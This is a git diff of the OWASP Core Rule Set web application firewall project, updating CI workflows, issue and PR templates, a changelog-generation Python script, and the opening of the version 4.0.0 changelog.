diff --git a/.changes-pending.md b/.changes-pending.md new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.editorconfig b/.editorconfig new file mode 100644 index 0000000000..037ae5e380 --- /dev/null +++ b/.editorconfig @@ -0,0 +1,24 @@ +# EditorConfig is awesome: https://EditorConfig.org + +# top-most EditorConfig file +root = true + +# Unix-style newlines with a newline ending every file +[*] +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true + +# Matches multiple files with brace expansion notation +# Set default charset +[*.py] +charset = utf-8 +# 4 space indentation +indent_style = space +indent_size = 4 + +# Indentation override for all JS under lib directory +[tests/regression/tests/**/*.yaml] +indent_style = space +indent_size = 2 + diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 0000000000..c0386a3ecd --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1 @@ +custom: https://coreruleset.org/donate diff --git a/.github/ISSUE_TEMPLATE/01_false-positive.md b/.github/ISSUE_TEMPLATE/01_false-positive.md index eeb0b7a3ee..8dfb24b590 100644 --- a/.github/ISSUE_TEMPLATE/01_false-positive.md +++ b/.github/ISSUE_TEMPLATE/01_false-positive.md @@ -1,31 +1,68 @@ --- name: 'False positive' -about: Report a false positive (incorrect blocking) +about: Report a false positive (blocking of benign traffic) title: '' -labels: 'False Positive' +labels: ':heavy_plus_sign: False Positive' assignees: '' --- + + ### Description - - - + + +### How to reproduce the misbehavior (-> curl call) + + + +### Logs + + - +If you cannot submit neither curl call nor log files nor a payload to reproduce +the behavior, there is litterally nothing we can do for you. Please help us to +get access to the information we need to help you. +--> ### Your Environment - - + -* CRS version (e.g., v3.2.0): -* Paranoia level setting: -* ModSecurity version (e.g., 2.9.3): -* Web Server and version (e.g., apache 2.4.41): +* CRS version (e.g., v3.3.4): +* Paranoia level setting (e.g. PL1) : +* ModSecurity version (e.g., 2.9.6): +* Web Server and version or cloud provider / CDN (e.g., Apache httpd 2.4.54): * Operating System and version: ### Confirmation diff --git a/.github/ISSUE_TEMPLATE/02_false-negative.md b/.github/ISSUE_TEMPLATE/02_false-negative.md index 75b0e3544f..76a9b4a907 100644 --- a/.github/ISSUE_TEMPLATE/02_false-negative.md +++ b/.github/ISSUE_TEMPLATE/02_false-negative.md @@ -1,30 +1,68 @@ --- name: 'False negative' -about: Report a false negative (incorrect bypass) +about: Report a false negative (ignoring of malicious traffic) title: '' -labels: 'False Negative - Evasion' +labels: ':heavy_minus_sign: False Negative - Evasion' assignees: '' --- + + ### Description - - - - - - - + + +### How to reproduce the misbehavior (-> curl call) + + + +### Logs + + ### Your Environment - - + -* CRS version (e.g., v3.2.0): -* Paranoia level setting: -* ModSecurity version (e.g., 2.9.3): -* Web Server and version (e.g., apache 2.4.41): +* CRS version (e.g., v3.3.4): +* Paranoia level setting (e.g. PL1) : +* ModSecurity version (e.g., 2.9.6): +* Web Server and version or cloud provider / CDN (e.g., Apache httpd 2.4.54): * Operating System and version: ### Confirmation diff --git a/.github/ISSUE_TEMPLATE/03_bug-report.md b/.github/ISSUE_TEMPLATE/03_bug-report.md index bc130f67f7..689b2b2a65 100644 --- a/.github/ISSUE_TEMPLATE/03_bug-report.md +++ b/.github/ISSUE_TEMPLATE/03_bug-report.md @@ -2,7 +2,7 @@ name: '🐞 Bug report' about: Create a report to help us improve title: '' -labels: 'Bug' +labels: ':bug: bug' assignees: '' --- diff --git a/.github/ISSUE_TEMPLATE/04_feature.md b/.github/ISSUE_TEMPLATE/04_feature.md index b2e82b611d..04939383a0 100644 --- a/.github/ISSUE_TEMPLATE/04_feature.md +++ b/.github/ISSUE_TEMPLATE/04_feature.md @@ -2,10 +2,16 @@ name: '🚀 Feature request' about: Suggest an idea for this project title: '' -labels: 'Feature Request' +labels: ':+1: Feature Request' assignees: '' --- + ### Motivation diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml index 4c1d7af743..3b47fbf3d9 100644 --- a/.github/ISSUE_TEMPLATE/config.yml +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -4,5 +4,5 @@ contact_links: url: https://security.stackexchange.com/questions/tagged/owasp-crs about: For help and support please go here. - name: OWASP Core Rule Set mailing list - url: https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project + url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project about: Ask general usage questions and participate in discussions on the CRS. diff --git a/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md b/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md new file mode 100644 index 0000000000..e71cd07cd3 --- /dev/null +++ b/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md @@ -0,0 +1,30 @@ +## Proposed changes + +Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue. + + + +## PR Checklist + + + +- [ ] I have read the [CONTRIBUTING](https://github.com/coreruleset/coreruleset/blob/v4.0/dev/CONTRIBUTING.md) doc +- [ ] I have added positive tests proving my fix/feature works as intended. +- [ ] I have added negative tests that prove my fix/feature considers common cases that might end in false positives +- [ ] In case you changed a regular expression, you are not adding a ReDOS for pcre. You can check this using [regexploit](https://github.com/doyensec/regexploit) +- [ ] My test use the `comment` field to write the expected behavior +- [ ] I have added documentation for the rule or change (when appropriate) + +## Further comments + + + +## For the reviewer + + + +- [ ] Positive and negative tests were added +- [ ] Tests cover the intended fix/feature properly +- [ ] No usage of dangerous constructs like `ctl:requestBodyAccess=Off` were used in the rule +- [ ] In case a regular expression was changed, [there is no ReDOS](https://github.com/coreruleset/coreruleset/wiki/Testing-for-Regular-Expresion-DoS) +- [ ] Documentation is clear for the rule/change diff --git a/.github/create-changelog-prs.py b/.github/create-changelog-prs.py new file mode 100755 index 0000000000..401dcfee24 --- /dev/null +++ b/.github/create-changelog-prs.py @@ -0,0 +1,184 @@ +#! /usr/bin/env python + +import subprocess +import json +import datetime +import sys +import os +import re + +DEVELOPERS = dict() + +def get_pr(repository: str, number: int) -> dict: + command = f"""gh pr view \ + --repo "{repository}" \ + "{number}" \ + --json mergeCommit,mergedBy,title,author,baseRefName,number + """ + proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + pr_json, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + return json.loads(pr_json) + +def get_prs(repository: str, day: datetime.date) -> list: + print(f"Fetching PRs for {day}") + command = f"""gh search prs \ + --repo "{repository}" \ + --merged-at "{day}" \ + --json number \ + -- \ + -label:changelog-pr # ignore changelog prs + """ + proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + prs_json, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + prs = list() + for result in json.loads(prs_json): + prs.append(get_pr(repository, result["number"])) + + return prs + +def parse_prs(prs: list) -> dict: + pr_map = dict() + for pr in prs: + merged_by = pr["mergedBy"]["login"] + if merged_by not in pr_map: + pr_list = list() + pr_map[merged_by] = pr_list + else: + pr_list = pr_map[merged_by] + pr_list.append(pr) + return pr_map + + +def create_prs(repository: str, merged_by_prs_map: dict, day: datetime.date): + for author in merged_by_prs_map.keys(): + create_pr(repository, author, merged_by_prs_map[author], day) + +def create_pr(repository: str, merged_by: str, prs: list, day: datetime.date): + if len(prs) == 0: + return + print(f"Creating changelog PR for @{merged_by}") + + sample_pr = prs[0] + base_branch = sample_pr["baseRefName"] + pr_branch_name = create_pr_branch(day, merged_by, base_branch) + pr_body, changelog_lines = generate_content(prs, merged_by) + create_commit(changelog_lines) + push_pr_branch(pr_branch_name) + + command = f"""gh pr create \ + --repo "{repository}" \ + --assignee "{merged_by}" \ + --base "{base_branch}" \ + --label "changelog-pr" \ + --title "chore: changelog updates for {day}, merged by @{merged_by}" \ + --body-file - + """ + + proc = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + outs, errors = proc.communicate(input=pr_body.encode()) + if proc.returncode != 0: + print(errors) + exit(1) + print(f"Created PR: {outs.decode()}") + +def create_commit(changelog_lines: str): + with open('.changes-pending.md', 'a') as changelog: + changelog.write(changelog_lines) + + command = "git commit .changes-pending.md -m 'Add pending changelog entries'" + proc = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE) + _, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + +def generate_content(prs: list, merged_by: str) -> (str, str): + changelog_lines = "" + pr_body = f"This PR was auto-generated to update the changelog with the following entries, merged by @{merged_by}:\n```\n" + pr_links = "" + for pr in prs: + pr_number = pr["number"] + pr_title = pr["title"] + pr_author = get_pr_author_name(pr["author"]["login"]) + new_line = f" * {pr_title} ({pr_author}) [#{pr_number}]\n" + pr_body += new_line + pr_links += f"- #{pr_number}\n" + + changelog_lines += new_line + pr_body += "```\n\n" + pr_links + + return pr_body, changelog_lines + +def get_pr_author_name(login: str) -> str: + if len(DEVELOPERS) == 0: + parse_contributors() + + return DEVELOPERS[login] if login in DEVELOPERS else f"@{login}" + +def parse_contributors(): + regex = re.compile(r'^\s*?-\s*?\[([^]]+)\]\s*?\(http.*/([^/]+)\s*?\)') + with open('CONTRIBUTORS.md', 'rt') as handle: + line = handle.readline() + while not ('##' in line and 'Contributors' in line): + match = regex.match(line) + if match: + DEVELOPERS[match.group(2)] = match.group(1) + line = handle.readline() + +def create_pr_branch(day: datetime.date, author: str, base_branch: str) -> str: + branch_name = f"changelog-updates-for-{day}-{author} {base_branch}" + command = f"git checkout -b {branch_name}" + proc = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE) + _, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + + return branch_name + +def push_pr_branch(branch_name: str): + command = f"git push -u origin {branch_name}" + proc = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE) + _, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + +def run(source_repository: str, target_repository: str, today: datetime.date): + day = today - datetime.timedelta(days=1) + prs = get_prs(source_repository, day) + prs_length = len(prs) + print(f"Found {prs_length} PRs") + if prs_length == 0: + return + + merged_by_prs_map = parse_prs(prs) + create_prs(target_repository, merged_by_prs_map, day) + +if __name__ == "__main__": + # disable pager + os.environ["GH_PAGER"] = '' + # set variables for Git + os.environ["GIT_AUTHOR_NAME"] = "changelog-pr-bot" + os.environ["GIT_AUTHOR_EMAIL"] = "dummy@coreruleset.org" + os.environ["GIT_COMMITTER_NAME"] = "changelog-pr-bot" + os.environ["GIT_COMMITTER_EMAIL"] = "dummy@coreruleset.org" + + source_repository = 'coreruleset/coreruleset' + target_repository = source_repository + # the cron schedule for the workflow uses UTC + today = datetime.datetime.now(datetime.timezone.utc).date() + + if len(sys.argv) > 1: + source_repository = sys.argv[1] + if len(sys.argv) > 2: + target_repository = sys.argv[2] + if len(sys.argv) > 3: + today = datetime.date.fromisoformat(sys.argv[3]) + run(source_repository, target_repository, today) diff --git a/.github/workflows/check-pr-dependencies.yaml b/.github/workflows/check-pr-dependencies.yaml new file mode 100644 index 0000000000..b93b11ce7e --- /dev/null +++ b/.github/workflows/check-pr-dependencies.yaml @@ -0,0 +1,19 @@ +name: Check PR dependencies +on: + pull_request_target: + types: + - opened + - reopened + - edited + - synchronize + +jobs: + check_dependencies: + runs-on: ubuntu-latest + name: Check Dependencies + permissions: + pull-requests: read # Reason: To check PRs for dependencies. + steps: + - uses: gregsdennis/dependencies-action@main + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/check-pr-title.yaml b/.github/workflows/check-pr-title.yaml new file mode 100644 index 0000000000..f5a6a4823c --- /dev/null +++ b/.github/workflows/check-pr-title.yaml @@ -0,0 +1,16 @@ +name: Check PR title +on: + pull_request_target: + types: + - opened + - reopened + - edited + - synchronize + +jobs: + check-pr-title: + runs-on: ubuntu-latest + steps: + - uses: aslafy-z/conventional-pr-title-action@v3 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/lint.yaml b/.github/workflows/lint.yaml index 161deb47a8..da99d3beda 100644 --- a/.github/workflows/lint.yaml +++ b/.github/workflows/lint.yaml @@ -1,4 +1,3 @@ ---- name: Lint on: [push, pull_request] @@ -6,17 +5,15 @@ on: [push, pull_request] jobs: check-syntax: runs-on: ubuntu-latest - strategy: - fail-fast: true - # check why is failing and change afterwards steps: - name: Checkout repo - uses: actions/checkout@v2 + uses: actions/checkout@v4 - name: Lint Yaml - uses: ibiqlik/action-yamllint@v1 + uses: ibiqlik/action-yamllint@v3 with: - file_or_dir: tests/regression/tests/**/*.yaml + format: github + file_or_dir: tests/regression/tests config_file: .yamllint.yml - name: Linelint @@ -24,15 +21,45 @@ jobs: id: linelint - name: Set up Python 3 - uses: actions/setup-python@v1 + uses: actions/setup-python@v4 with: - python-version: 3.6 + python-version: 3.7 - name: "Check CRS syntax" run: | - python -V pip install --upgrade setuptools - pip install -r tests/integration/requirements.txt - git clone https://github.com/CRS-support/secrules_parsing - pip install -r secrules_parsing/requirements.txt - python secrules_parsing/secrules_parser.py -c -f rules/*.conf + pip install secrules-parsing + secrules-parser -c --output-type github -f rules/*.conf + + - name: "Check CRS formatting" + run: | + pip install --upgrade setuptools + pip install -r ./util/crs-rules-check/requirements.txt + ./util/crs-rules-check/rules-check.py --output=github -r crs-setup.conf.example -r rules/*.conf -t util/APPROVED_TAGS + + - name: "Find rules without test" + run: | + pip install --upgrade setuptools + pip install -r ./util/find-rules-without-test/requirements.txt + ./util/find-rules-without-test/find-rules-without-test.py --output=github . + + - name: "Install crs-toolchain" + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh release download -R coreruleset/crs-toolchain -p '*_linux_amd64.tar.gz' + ls crs-toolchain* + tar xzf crs-toolchain*_linux_amd64.tar.gz + rm crs-toolchain*_linux_amd64.tar.gz + + - name: "Check that all assembly files are properly formatted" + run: | + ./crs-toolchain regex format -aco github + + - name: "Check that all rules are up to date" + run: | + ./crs-toolchain regex compare -ao github + + - name: "Check that all tests are properly numbered" + run: | + ./crs-toolchain util renumber-tests -cao github diff --git a/.github/workflows/nightly.yml b/.github/workflows/nightly.yml new file mode 100644 index 0000000000..b01213785c --- /dev/null +++ b/.github/workflows/nightly.yml @@ -0,0 +1,61 @@ + +name: Nightly Release +on: + schedule: + - cron: '0 2 * * *' # run at 2 AM UTC + +jobs: + nightly: + name: Nightly Release + runs-on: ubuntu-latest + steps: + - name: "Checkout repo" + uses: actions/checkout@v4 + + - name: Delete previous nightly release + run: | + gh release delete --repo coreruleset/coreruleset --cleanup-tag --yes nightly + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Create nightly release + run: | + notes=$(cat <<"EOF" + Nightly releases are snapshots of the development activity on the Core Rule Set project that may include new features and bug fixes scheduled for upcoming releases. These releases are made available to make it easier for users to test their existing configurations against the Core Rule Set code base for potential issues or to experiment with new features, with a chance to provide feedback on ways to improve the changes before being released. + + As these releases are snapshots of the latest code, you may encounter an issue compared to the latest stable release so users are encouraged to run nightly releases in a non production environment. If you encounter an issue, please check our issue tracker to see if the issue has already been reported; if a report hasn't been made, please report it so we can review the issue and make any needed fixes. + EOF + ) + + gh release create \ + --repo coreruleset/coreruleset \ + --latest \ + --prerelease \ + --draft=false \ + --title "Latest Nightly" \ + --notes "${notes}" \ + nightly + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Publish draft if necessary + run: | + echo "A race condition in the GH API can cause a release published for a previously existing tag to be published as draft." + echo "Wait for 30 seconds for the API to catch up to the actual state, then check that the release has been properly published." + echo "If the release is still a draft, publish it." + sleep 30 + if gh release list --repo coreruleset/coreruleset --exclude-drafts | grep --quiet nightly; then + echo "Nightly release was created properly" + exit 0 + fi + + echo "Nightly release was created as draft. Publishing now." + + gh release edit \ + --repo coreruleset/coreruleset \ + --latest \ + --prerelease \ + --draft=false \ + nightly + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml index f3e129c8bc..3318a744aa 100644 --- a/.github/workflows/stale.yml +++ b/.github/workflows/stale.yml @@ -10,10 +10,11 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/stale@v1 + - uses: actions/stale@v3 with: repo-token: ${{ secrets.GITHUB_TOKEN }} - stale-issue-message: 'This issue has been open 120 days with no activity. Remove the stale label or comment, or this will be closed in 14 days' + stale-issue-message: 'This issue has been open 30 days waiting for feedback. Remove the stale label or comment, or this will be closed in 14 days' stale-issue-label: 'Stale issue' - days-before-stale: 120 + days-before-stale: 30 days-before-close: 14 + only-issue-labels: ':hourglass_flowing_sand: awaiting feedback' diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 1f2019b80b..eb8876b5b8 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -1,4 +1,3 @@ ---- name: Regression Tests on: @@ -11,64 +10,50 @@ on: paths: - 'rules/**' - 'tests/**' + - 'util/**' - '.github/**' jobs: - # "modsec2-apache", "modsec3-apache", "modsec3-nginx" regression: runs-on: ubuntu-latest strategy: - # change to true - fail-fast: false matrix: modsec_version: [modsec2-apache] - tests: [REQUEST-911-METHOD-ENFORCEMENT, - REQUEST-913-SCANNER-DETECTION, - REQUEST-920-PROTOCOL-ENFORCEMENT, - REQUEST-921-PROTOCOL-ATTACK, - REQUEST-930-APPLICATION-ATTACK-LFI, - REQUEST-931-APPLICATION-ATTACK-RFI, - REQUEST-932-APPLICATION-ATTACK-RCE, - REQUEST-933-APPLICATION-ATTACK-PHP, - REQUEST-934-APPLICATION-ATTACK-NODEJS, - REQUEST-941-APPLICATION-ATTACK-XSS, - REQUEST-942-APPLICATION-ATTACK-SQLI, - REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION, - REQUEST-944-APPLICATION-ATTACK-JAVA] - # Will include soon for modsec3-nginx - steps: - - name: Checkout repo - uses: actions/checkout@v2 + - name: "Checkout repo" + uses: actions/checkout@v4 - - name: Set up Python 2 - uses: actions/setup-python@v1 - with: - python-version: 2.7 + - name: "Install dependencies" + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GO_FTW_VERSION: '0.6.4' + run: | + gh release download -R coreruleset/go-ftw v${GO_FTW_VERSION} -p "ftw_${GO_FTW_VERSION}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw - - name: "Run tests for ${{ matrix.modsec_version }}`" + - name: "Run tests for ${{ matrix.modsec_version }}" + run: | + mkdir -p tests/logs/${{ matrix.modsec_version }}/{nginx,apache2} + docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" + docker-compose -f ./tests/docker-compose.yml logs + [ $(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}') = 'true' ] + ./ftw check -d tests/regression/tests + ./ftw run -d tests/regression/tests --show-failures-only env: - CONFIG: ${{ matrix.modsec_version }} + FTW_LOGFILE: './tests/logs/${{ matrix.modsec_version }}/error.log' + + - name: "Change permissions if failed" + if: failure() run: | - python -V - mkdir -p logs/"${CONFIG}" - docker-compose -f ./tests/docker-compose.yml up -d "${CONFIG}" - pip install --upgrade setuptools - pip install -r tests/regression/requirements.txt - # Use mounted volume path - if [[ "${CONFIG}" == *"nginx" ]]; then - LOGDIR="/var/log/nginx" - else - LOGDIR="/var/log/apache2" - fi - sed -ie "s:${LOGDIR}:${GITHUB_WORKSPACE}/logs/${CONFIG}:g" tests/regression/config.ini - py.test -vs tests/regression/CRS_Tests.py \ - --config="${CONFIG}" \ - --ruledir=./tests/regression/tests/${{ matrix.tests }} + # we want to get the audit log, so change permissions (file is only for root on docker) + sudo chmod 644 tests/logs/${{ matrix.modsec_version }}/modsec_audit.log + + - uses: actions/upload-artifact@v3 + if: failure() + with: + name: waf-logs + path: tests/logs/${{ matrix.modsec_version }} - name: Clean docker-compose - env: - CONFIG: modsec2-apache run: | - docker-compose -f ./tests/docker-compose.yml stop "${CONFIG}" + docker-compose -f ./tests/docker-compose.yml stop "${{ matrix.modsec_version }}" docker-compose -f ./tests/docker-compose.yml down diff --git a/.github/workflows/update-changelog.yaml b/.github/workflows/update-changelog.yaml new file mode 100644 index 0000000000..6a5c813d64 --- /dev/null +++ b/.github/workflows/update-changelog.yaml @@ -0,0 +1,23 @@ +name: Create changelog PRs +on: + schedule: + - cron: '0 2 * * *' # run at 2 AM UTC + +jobs: + create-changelog-prs: + name: + runs-on: ubuntu-latest + steps: + - name: "Checkout repo" + uses: actions/checkout@v4 + + - name: Set up Python 3 + uses: actions/setup-python@v4 + with: + python-version: 3.12 + + - name: "Run script" + run: ".github/create-changelog-prs.py" + env: + # Required for the use of the gh CLI in the script + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.gitignore b/.gitignore index a8f9bac6b8..dabe18fda5 100644 --- a/.gitignore +++ b/.gitignore @@ -10,6 +10,10 @@ rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf # util/upgrade.py geoip util/geo-location/GeoIP.dat +# PHP functions frequency list generated and updated by running +# util/php-dictionary-gen.sh +util/php-dictionary-gen/frequencylist.txt + # Unit test caches .cache @@ -19,3 +23,12 @@ __pycache__/ *$py.class .idea/ + +# Ignore test logs +tests/logs/ + +# ignore .env in tests for docker-compose variables +tests/.env + +# Ignore Go-FTW configuration file +.ftw.yaml diff --git a/.gitmodules b/.gitmodules index 5921187608..c68ffddc5b 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,4 @@ [submodule "docs/OWASP-CRS-Documentation"] path = docs/OWASP-CRS-Documentation - url = https://github.com/SpiderLabs/OWASP-CRS-Documentation - branch = master + url = https://github.com/coreruleset/documentation.git + branch = main diff --git a/.linelint.yml b/.linelint.yml index 12e7c88e61..e2111917a1 100644 --- a/.linelint.yml +++ b/.linelint.yml @@ -10,3 +10,4 @@ rules: # will be ignored only by this rule ignore: - .pytest_cache/* + - .changes-pending.md diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml new file mode 100644 index 0000000000..01e1a0fb24 --- /dev/null +++ b/.pre-commit-config.yaml @@ -0,0 +1,13 @@ +--- +# Update the rev variable with the release version that you want, from the yamllint repo +# You can pass your custom .yamllint with args attribute. +repos: +- repo: https://github.com/pre-commit/pre-commit-hooks + rev: v4.4.0 + hooks: + - id: check-yaml + args: [--allow-multiple-documents] + - id: end-of-file-fixer + - id: trailing-whitespace + exclude: '^regex-assembly/' + args: [--markdown-linebreak-ext=md] diff --git a/.travis.yml b/.travis.yml deleted file mode 100644 index 96765998f3..0000000000 --- a/.travis.yml +++ /dev/null @@ -1,31 +0,0 @@ -os: linux -language: python -python: - - 2.7 - -# no more required in travis -#sudo: required - -services: - - docker - -jobs: - include: - script: - - | - if [[ "$TRAVIS_PULL_REQUEST" != "false" ]]; then - docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_PULL_REQUEST_SLUG -e BRANCH=$TRAVIS_PULL_REQUEST_BRANCH themiddle/crs-test - else - docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_REPO_SLUG -e BRANCH=$TRAVIS_BRANCH themiddle/crs-test - fi - -# safelist -branches: - only: - - v3.1/dev - - v3.2/dev - - v3.3/dev - - fix-travis - -#notifications: -# irc: "chat.freenode.net#modsecurity" diff --git a/.yamllint.yml b/.yamllint.yml index 6e15cc1159..9064fad92a 100644 --- a/.yamllint.yml +++ b/.yamllint.yml @@ -11,8 +11,12 @@ rules: tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml + tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml + tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml # don't bother me with this rule indentation: disable - comments: {require-starting-space: false} + comments: + require-starting-space: true # default + min-spaces-from-content: 1 diff --git a/CHANGES b/CHANGES.md similarity index 57% rename from CHANGES rename to CHANGES.md index 390baf3900..ad836d4006 100644 --- a/CHANGES +++ b/CHANGES.md @@ -1,11 +1,566 @@ -== OWASP ModSecurity Core Rule Set (CRS) CHANGES == +# OWASP CRS CHANGES -== Report Bugs/Issues to GitHub Issues Tracker or the mailinglist == +## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist * https://github.com/coreruleset/coreruleset/issues or the CRS Google Group at -* https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project +* https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project -== Version 3.3.0 - 2020-07-01 == +## Nightly builds +New changelog entries are written to `.changes-pending.md`. They will be moved to the main changelog before a release. + +## Version 4.0.0 - 2024-02-14 + +Important changes: + * feat: introduce plugin architecture for extending CRS and minimizing attack surface. (Christian Folini, Max Leske, Jozef Sudolský, Andrew Howe) [#2038, #2448, #2404] + * feat: migrate application exclusions and less-used functionality to plugins (Christian Folini, Max Leske, Jozef Sudolský, Andrew Howe) + * feat: introduce early blocking option (Christian Folini) [#1955] + * feat: introduce new rule file/category to detect use of common web shells in responses (955100-955340 PL1, 955350 PL2) (Jozef Sudolský, Andrea Menin) [#1962, #2039, #2116] + * feat: rename 'Node.js' category to 'generic' (Felipe Zipitría) [#2340] + * feat: make all formerly PCRE-only regular expressions compatible with RE2/Hyperscan regular expression engines (Max Leske, Felipe Zipitría, Allan Boll, Franziska Bühler) [#1868, #2356, #2425, #2426, #2371, #2372] + * feat: add support for HTTP/3 (Jozef Sudolský) [#3218] + * feat: add granular control over reporting levels in 9801xx rules (Simon Studer, Andrew Howe, Christian Folini) [#2482, #2488] + * feat: add new rule to explicitly detect multiple Content-Type abuse (CVE-2023-38199) (920620 PL1) (Andrea Menin) [#3237] + * feat: add enable_default_collections flag to not initialize collections by default (Matteo Pace) [#3141] + * feat: extend definition of restricted headers to include `Content-Encoding` and `Accept-Charset` by default (920450 PL1, 920451 PL2) (Walter Hop) [#2780, #2782] + * feat: drop HTTP/0.9 support to resolve FP (Federico G. Schwindt) [#1966] + * fix: refactor and rename anomaly scoring variables and paranoia level definition (Simon Studer) [#2417] + * tests: complete goal of 100% test coverage for rules (entire team, Juan-Pablo Tosso, NiceYouKnow) + * feat: switch to using WordNet instead of spell for finding English words in spell.sh (Max Leske) [#3242] + * feat: publish nightly packages regularly (Felipe Zipitría) [#2207] + +Tool changes: + * feat: extend spell.sh script with an opt-in manual list of common and partial words. (Matteo Pace) [#3273] + * feat: rework spell.sh utility to help with detection of false positives English words (Andrea Menin) [#3029] + * feat: improve usability of spell.sh utility (Max Leske) [#3238] + * feat: extend rules-check.py script to better enforce rule format in project guidelines (Ervin Hegedus) [#3113] + * feat: extend rules-check.py script to ensure that `auditLogParts` is only used in last chained rule (Ervin Hegedus) [#2609] + * feat: extend rules-check.py script to ensure that rules use `@rx` operator explicitly (Ervin Hegedus) [#2541] + * feat: extend rules-check.py script to strip comments when parsing crs-setup.conf.example (Ervin Hegedus) [#3161] + * feat: add utility to change version numbers (Ervin Hegedus) [#2085] + * feat: add utility script to find rules without tests (Ervin Hegedus) [#2279] + * feat: add crs-rules-check tool that runs sanity checks against rules (Ervin Hegedus) [#2236] + * feat: add utility to find longest data lengths (Ervin Hegedus) [#2277] + * feat: improve rule-ctl script to modify rules (Max Leske) [#2193] + * feat: improve unique ID matching and documentation in send-payload-pls.sh (Manuel Spartan) [#2288] + * feat: unify regexp utils to automate error-prone actions and automatically update rules from regular expression sources (Max Leske) [#2149, #2223, #2423, #2495, #2489, #2473] + * fix: adjust log directories needed for volume mounts to Git (Max Leske) [#2103] + * fix: replace backend docker container for tests to fix JSON Unicode reflection (Max Leske) [#3464] + * feat: add new test method: check for tags on rules against allowlist (Ervin Hegedus) [#3437] + +Changes with direct rule impact (sorted by lowest rule ID per change where available): + * feat: add placeholder files for new plugin architecture (Walter Hop) [#2515] + * feat: check initialization and use for all TX variables (Ervin Hegedus) [#3043] + * feat: extend rule to detect restricted `method override` headers (Mark Zeman / KramNamez) [#3056] + * feat: extend rules to detect keyword `time` as prefix of \*nix and Windows RCE rules (rules later replaced) (Franziska Bühler) [#2819] + * feat: improve Unix shell evasion prefix (various rules) (Jitendra Patro, Max Leske) [#3518] + * feat: improve performance by removing unnecessary lowercase transformations (various rules) (Jozef Sudolský) [#2106] + * feat: add additional prefix commands to 'unix-shell-evasion-prefix' (various rules) (Jitendra Patro) [#3557 + * feat: consolidate 'unix-evasion-prefix*' files to ensure they don't diverge (various rules) (Franziska Bühler, Max Leske, Andrew Howe) [#3531] + * feat: move regexp-assemble data files to root directory (Felipe Zipitría) [#3002] + * feat: move rules to the earliest phase possible based on their inputs (various rules) (Ervin Hegedus) [#1941] + * feat: remove superfluous 'urlDecodeUni' transformations (various rules) (Federico G. Schwindt) [#1845] + * feat: rename 'tx.blocking_early' to 'tx.early_blocking' (various rules) (Christian Folini) [#2414] + * feat: simplify regular expressions by replacing upper-case with lower-case matches if the expression is case-insensitive (various rules) (Felipe Zipitría) [#2485] + * feat: remove SecCollectionTimeout from crs-setup.conf (Christian Folini) [#3559] + * fix: do not log 'MATCHED_VAR' when the it contains the full response body (various rules) (Jozef Sudolský) [#1985] + * fix: do not unnecessarily escape forward slashes in regular expressions (various rules) (Federico G. Schwindt) [#1842] + * fix: reformat several initialization rules to follow project guidelines (Ervin Hegedus) [#3157] + * fix: remove auditLogParts actions from all rules where present (Andrea Menin, Ervin Hegedus) [#3034, #3081] + * fix: remove uncommon Content Types from default in `crs-setup.conf.example` (Andrea Menin) [#2768] + * fix: update diverse 